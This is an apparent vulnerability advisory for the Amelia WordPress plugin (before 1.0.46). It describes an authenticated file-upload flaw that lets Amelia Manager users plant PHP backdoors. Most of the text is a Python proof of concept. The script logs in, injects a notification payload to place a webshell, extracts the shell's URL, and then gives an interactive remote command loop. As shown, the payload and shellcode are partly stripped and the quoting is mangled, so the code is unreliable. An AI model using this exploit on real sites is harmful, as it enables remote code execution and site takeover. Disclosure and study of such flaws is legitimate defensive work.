Amelia < 1.0.46 - Manager+ RCE

The plugin stores image blobs into actual files whose extension is controlled by the user, which may lead to PHP backdoors being uploaded onto the site. This vulnerability can be exploited by logged-in users with the custom “Amelia Manager” role.

PoC

import requests import base64 BASE_URL = “http://localhost:8000” id = “wordpress” pw = “wordpress” def login(id, pw) : sess = requests.Session() sess.post( BASE_URL + “/wp-login.php”, data = { ‘log’: id, ‘pwd’: pw, ‘wp-submit’: ‘%EB%A1%9C%EA%B7%B8%EC%9D%B8’, ‘testcookie’: ‘1’ } ).text return sess def exploit(sess) : SHELLCODE = b"" payload = r’‘’{“id”:1,“name”:“customer_appointment_approved”,“customName”:null,“status”:“enabled”,“type”:“email”,“entity”:“appointment”,“time”:null,“timeBefore”:null,“timeAfter”:null,“sendTo”:“customer”,“subject”:“%service_name% Appointment Approved”,‘’’ payload += r’‘’“content”:"

Dear %customer_full_name%,

You have successfully scheduled %service_name% appointment with**%employee_full_name%. We are waiting you at%location_address% on%appointment_date_time%**.

Thank you for choosing our company,

%company_name%

“,“translations”:null,“entityIds”:null,“sendOnlyMe”:null}‘’’ res = sess.post( f”{BASE_URL}/wp-admin/admin-ajax.php?action=wpamelia_api&call;=/notifications/1", data = payload, headers = {“Content-Type”: “application/json;charset=UTF-8”} ) SHELL_ADDR = res.json()[‘data’][‘notification’][‘content’] SHELL_ADDR = SHELL_ADDR[SHELL_ADDR.find(‘src="’)+5:] SHELL_ADDR = SHELL_ADDR[:SHELL_ADDR.find(‘"’)] while True : cmd = input("$ ") if cmd.lower() == “exit” or cmd.lower() == “quit” : break res = sess.post( SHELL_ADDR, data = {“qerogram” : cmd} ) print(res.text) sess = login(id,pw) exploit(sess)